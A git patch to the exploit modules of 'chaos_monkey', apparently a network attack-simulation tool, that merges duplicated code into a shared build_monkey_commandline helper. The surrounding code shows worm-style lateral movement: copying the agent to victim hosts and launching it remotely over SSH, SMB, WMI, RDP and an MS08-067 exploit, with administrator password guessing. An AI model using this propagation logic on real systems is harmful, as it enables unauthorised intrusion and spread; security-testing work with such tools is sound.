From 76e3350fa38c785b48278976b9e6c282a911465a Mon Sep 17 00:00:00 2001
From: itsikkes <itsikkes@users.noreply.github.com>
Date: Tue, 26 Jul 2016 18:52:58 +0300
Subject: [PATCH] merge duplicate code

---
 chaos_monkey/exploit/rdpgrinder.py   | 10 ++--------
 chaos_monkey/exploit/smbexec.py      | 10 ++--------
 chaos_monkey/exploit/sshexec.py      | 11 ++---------
 chaos_monkey/exploit/tools.py        | 20 +++++++++++++++++++-
 chaos_monkey/exploit/win_ms08_067.py | 11 +++--------
 chaos_monkey/exploit/wmiexec.py      | 10 ++--------
 6 files changed, 30 insertions(+), 42 deletions(-)

diff --git a/chaos_monkey/exploit/rdpgrinder.py b/chaos_monkey/exploit/rdpgrinder.py
index ad803b326..abc9afe7b 100644
--- a/chaos_monkey/exploit/rdpgrinder.py
+++ b/chaos_monkey/exploit/rdpgrinder.py
@@ -13,6 +13,7 @@ from model import RDP_CMDLINE_HTTP_BITS, RDP_CMDLINE_HTTP_VBS
 from model.host import VictimHost
 from network.tools import check_port_tcp
 from exploit.tools import get_target_monkey
+from tools import build_monkey_commandline
 __author__ = 'hoffer'
 
 KEYS_INTERVAL = 0.1
@@ -259,14 +260,7 @@ class RdpExploiter(HostExploiter):
             LOG.debug("Exploiter RdpGrinder failed, http transfer creation failed.")
             return False
 
-        cmdline = " -p " + self._guid
-
-        if host.default_tunnel:
-            cmdline += " -t " + host.default_tunnel
-        if host.default_server:
-            cmdline += " -s " + host.default_server
-        if depth > 0:
-            cmdline += " -d %d" % (depth - 1)
+        cmdline = build_monkey_commandline(host, depth-1)
 
         if self._config.rdp_use_vbs_download:
             command = RDP_CMDLINE_HTTP_VBS % {'monkey_path': self._config.dropper_target_path, 'http_path': http_path, 'parameters': cmdline}
diff --git a/chaos_monkey/exploit/smbexec.py b/chaos_monkey/exploit/smbexec.py
index 3acc928d2..e4e33a0d9 100644
--- a/chaos_monkey/exploit/smbexec.py
+++ b/chaos_monkey/exploit/smbexec.py
@@ -6,6 +6,7 @@ from exploit import HostExploiter
 from network.tools import check_port_tcp
 from exploit.tools import SmbTools, get_target_monkey
 from network import SMBFinger
+from tools import build_monkey_commandline
 
 try:
     from impacket import smb
@@ -104,14 +105,7 @@ class SmbExploiter(HostExploiter):
         else:
             cmdline = MONKEY_CMDLINE_DETACHED % {'monkey_path': remote_full_path}
 
-        cmdline += " -p " + self._guid
-
-        if host.default_tunnel:
-            cmdline += " -t " + host.default_tunnel
-        if host.default_server:
-            cmdline += " -s " + host.default_server
-        if depth > 0:
-            cmdline += " -d %d" % (depth - 1)
+        cmdline +=  build_monkey_commandline(host, depth-1)
 
         for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values():
             rpctransport = transport.DCERPCTransportFactory(str_bind_format % (host.ip_addr, ))
diff --git a/chaos_monkey/exploit/sshexec.py b/chaos_monkey/exploit/sshexec.py
index d6fcf52b5..717fc9bae 100644
--- a/chaos_monkey/exploit/sshexec.py
+++ b/chaos_monkey/exploit/sshexec.py
@@ -1,6 +1,7 @@
 import paramiko
 import monkeyfs
 import logging
+from tools import build_monkey_commandline
 from exploit import HostExploiter
 from model import MONKEY_ARG
 from exploit.tools import get_target_monkey
@@ -19,7 +20,6 @@ class SSHExploiter(HostExploiter):
 
     def __init__(self):
         self._config = __import__('config').WormConfiguration
-        self._guid = __import__('config').GUID
         self._update_timestamp = 0
 
     def log_transfer(self, transferred, total):
@@ -118,14 +118,7 @@ class SSHExploiter(HostExploiter):
 
         try:
             cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG)
-            cmdline += " -p " + self._guid
-            if host.default_tunnel:
-                cmdline += " -t " + host.default_tunnel
-            if host.default_server:
-                cmdline += " -s " + host.default_server
-            if depth > 0:
-                cmdline += " -d %d" % (depth - 1)
-
+            cmdline += build_monkey_commandline(host, depth-1)
             cmdline += "&"
             ssh.exec_command(cmdline)
 
diff --git a/chaos_monkey/exploit/tools.py b/chaos_monkey/exploit/tools.py
index d9f365aa9..7654abb30 100644
--- a/chaos_monkey/exploit/tools.py
+++ b/chaos_monkey/exploit/tools.py
@@ -396,4 +396,22 @@ def get_target_monkey(host):
                             host.os.get('machine','').lower() == platform.machine().lower():
                 monkey_path = sys.executable
             
-    return monkey_path
\ No newline at end of file
+    return monkey_path
+
+
+def build_monkey_commandline(target_host, depth):
+    from config import WormConfiguration, GUID
+
+    cmdline = ""
+    cmdline += " -p " + GUID
+
+    if target_host.default_tunnel:
+        cmdline += " -t " + target_host.default_tunnel
+    if target_host.default_server:
+        cmdline += " -s " + target_host.default_server
+    if depth < 0:
+        depth = 0
+
+    cmdline += " -d %d" % depth
+
+    return cmdline
diff --git a/chaos_monkey/exploit/win_ms08_067.py b/chaos_monkey/exploit/win_ms08_067.py
index 0c038a535..a7bdf2d47 100644
--- a/chaos_monkey/exploit/win_ms08_067.py
+++ b/chaos_monkey/exploit/win_ms08_067.py
@@ -17,6 +17,7 @@ from . import HostExploiter
 from exploit.tools import SmbTools, get_target_monkey
 from network.tools import check_port_tcp
 from network import SMBFinger
+from tools import build_monkey_commandline
 
 try:
     from impacket import smb
@@ -230,6 +231,7 @@ class Ms08_067_Exploiter(HostExploiter):
                                               self._config.ms08_067_remote_user_pass,
                                               src_path,
                                               self._config.dropper_target_path)
+
         if not remote_full_path:
             # try other passwords for administrator
             for password in self._config.psexec_passwords:
@@ -250,14 +252,7 @@ class Ms08_067_Exploiter(HostExploiter):
         else:
             cmdline = MONKEY_CMDLINE % {'monkey_path': remote_full_path}
 
-        cmdline += " -p " + self._guid
-
-        if host.default_tunnel:
-            cmdline += " -t " + host.default_tunnel
-        if host.default_server:
-            cmdline += " -s " + host.default_server
-        if depth > 0:
-            cmdline += " -d %d" % (depth - 1)
+        cmdline += build_monkey_commandline(host, depth - 1)
 
         try:
             sock.send("start %s\r\n" % (cmdline, ))
diff --git a/chaos_monkey/exploit/wmiexec.py b/chaos_monkey/exploit/wmiexec.py
index 28dab01f3..86a34e5c5 100644
--- a/chaos_monkey/exploit/wmiexec.py
+++ b/chaos_monkey/exploit/wmiexec.py
@@ -2,6 +2,7 @@ import socket
 import ntpath
 import logging
 import traceback
+from tools import build_monkey_commandline
 from model import DROPPER_CMDLINE, MONKEY_CMDLINE
 from model.host import VictimHost
 from exploit import HostExploiter
@@ -85,14 +86,7 @@ class WmiExploiter(HostExploiter):
             else:
                 cmdline = MONKEY_CMDLINE % {'monkey_path': remote_full_path}
 
-            cmdline += " -p " + self._guid
-
-            if host.default_tunnel:
-                cmdline += " -t " + host.default_tunnel
-            if host.default_server:
-                cmdline += " -s " + host.default_server
-            if depth > 0:
-                cmdline += " -d %d" % (depth - 1)
+            cmdline += build_monkey_commandline(host, depth - 1)
 
             # execute the remote monkey
             result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(cmdline,